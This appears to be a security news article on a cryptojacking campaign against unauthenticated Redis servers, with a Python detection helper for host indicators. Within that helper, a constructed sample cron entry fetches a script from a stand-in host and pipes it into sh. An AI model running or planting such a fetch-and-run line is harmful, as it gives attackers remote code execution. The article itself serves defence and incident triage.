Redis Servers Targeted in Sophisticated Cryptojacking Attack to Deploy Miners and Bypass Security

A new analysis reveals that tens of thousands of Redis servers worldwide remain vulnerable to an advanced cryptojacking campaign orchestrated by the threat actor TA-NATALSTATUS, which has evolved far beyond simple cryptocurrency mining to establish persistent, stealthy infrastructure takeovers.

The campaign exploits exposed Redis instances to deploy sophisticated malware that hides processes, obfuscates commands, and maintains long-term persistence through rootkit-like techniques.

Global Scale of Vulnerability Exposes Critical Infrastructure Gaps

The threat landscape reveals alarming exposure rates across major economies, with over 17% of Redis servers in the United States remaining unauthenticated.

By comparison, several European nations face even higher exposure: 33% in Germany, 27% in the United Kingdom, and 41% in Finland. This widespread misconfiguration provides TA-NATALSTATUS with a massive attack surface, enabling automated scanning campaigns that leverage legitimate Redis commands rather than complex exploits.

The attack methodology exploits the “root by inheritance” technique, where Redis servers running with root privileges allow attackers to manipulate configuration settings using CONFIG SET and SAVE commands to inject malicious cron jobs directly into /var/spool/cron/root.

This approach bypasses traditional privilege escalation by inheriting administrative access from the misconfigured service itself.

Advanced Evasion Techniques Transform Commodity Attacks

What distinguishes TA-NATALSTATUS from typical cryptojacking operations is its sophisticated anti-detection arsenal.

The malware employs process hijacking by renaming system binaries such as ps and top to .original copies, then replacing them with malicious wrappers that filter the mining process (httpgd) out of administrative visibility.

Additionally, the attackers rename the standard download tools curl and wget to cd1 and wd1 respectively, evading security products that monitor those binaries for malicious file transfers.

The campaign implements a four-stage lifecycle beginning with systemic sabotage that disables SELinux and firewalls, followed by installation of scanning tools like masscan and pnscan for lateral movement.

The third stage transforms compromised hosts into distributed scanning nodes using shard-based IPv4 address space coverage, while the final persistence stage employs chattr +i commands to create immutable files that resist deletion even by root users.

Comprehensive Defense Strategy Required

Organizations must implement immediate Redis hardening measures, including strong authentication, network isolation through bind 127.0.0.1 configurations, and regular monitoring for suspicious cron jobs containing /dev/null redirections.

Detection efforts should focus on identifying hijacked binaries, immutable files with lsattr, and the distinctive SSH backdoor key comment “uc1” that provides persistent remote access.
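As an added illustration (not code from the article or from any tool it names), the following Python triage helper checks the host-level indicators the two preceding paragraphs describe: cron entries with /dev/null redirections or calls to the renamed downloaders cd1/wd1, the .original copies of ps and top, immutable files in lsattr output, and SSH keys whose comment is uc1. The sample cron, authorized_keys and lsattr contents are constructed, and the binary paths checked are assumptions.

```python
import os
import re

# Constructed sample artifacts (not real captures) mirroring the article's indicators.
# On a live host, replace them with the real file contents and `lsattr -R` output.
CRON_ROOT = """*/1 * * * * /usr/bin/cd1 -fsSL http://example.invalid/rs.sh | sh > /dev/null 2>&1
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""
AUTHORIZED_KEYS = """ssh-rsa AAAAB3NzaPLACEHOLDERKEY1 admin@workstation
ssh-rsa AAAAB3NzaPLACEHOLDERKEY2 uc1
"""
LSATTR_OUTPUT = """----i---------e------- /var/spool/cron/root
--------------e------- /etc/hostname
"""
# Paths present in the constructed host view: ps was copied aside and curl renamed.
PRESENT_PATHS = {"/bin/ps.original", "/usr/bin/top", "/usr/bin/cd1"}

def cron_findings(text):
    """Flag cron lines that silence output via /dev/null or call the renamed downloaders."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "/dev/null" in line or re.search(r"\b(cd1|wd1)\b", line):
            hits.append(line)
    return hits

def ssh_key_findings(text):
    """Return authorized_keys entries whose trailing comment is the backdoor marker uc1."""
    return [l for l in text.splitlines() if l.split() and l.split()[-1] == "uc1"]

def immutable_findings(lsattr_text):
    """Parse lsattr output; an 'i' in the attribute column marks an immutable file."""
    found = []
    for line in lsattr_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            found.append(parts[1])
    return found

def hijacked_binary_findings(exists=os.path.exists):
    """Report renamed tools (ps/top -> .original, curl/wget -> cd1/wd1); paths are assumed."""
    suspects = ["/bin/ps.original", "/usr/bin/ps.original", "/bin/top.original",
                "/usr/bin/top.original", "/usr/bin/cd1", "/usr/bin/wd1", "/bin/cd1", "/bin/wd1"]
    return [p for p in suspects if exists(p)]

if __name__ == "__main__":
    print("cron:", cron_findings(CRON_ROOT))
    print("ssh keys:", ssh_key_findings(AUTHORIZED_KEYS))
    print("immutable:", immutable_findings(LSATTR_OUTPUT))
    print("binaries:", hijacked_binary_findings(PRESENT_PATHS.__contains__))
```

Passing the real os.path.exists (the default) to hijacked_binary_findings runs the binary check against the local host instead of the constructed view.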

The campaign’s extensive kill list targeting rival malware families like Kinsing and DDG demonstrates the competitive nature of the cryptojacking ecosystem. It underscores the need for comprehensive security monitoring beyond traditional antivirus solutions.

File Hashes and Names

SHA256 Hash                                                         File Name
58eeceb920a460a5f389acb23e5f8d86c3391788f9c9f5a4b396e3f4f84782c3    Dat file
04ae5583ebb88d197f203da92cbc17e5deedd2dc2297b30713ffe697102766b8    rs.sh
254d0672515295890354a58cb6f83758e8eceee9bb5b7c5be08813496e59f24a    ndt.sh
f0ff790b0eb3479ab90889223b88826be95051a7170285774b4a06b6d34d0771    nnt.sh
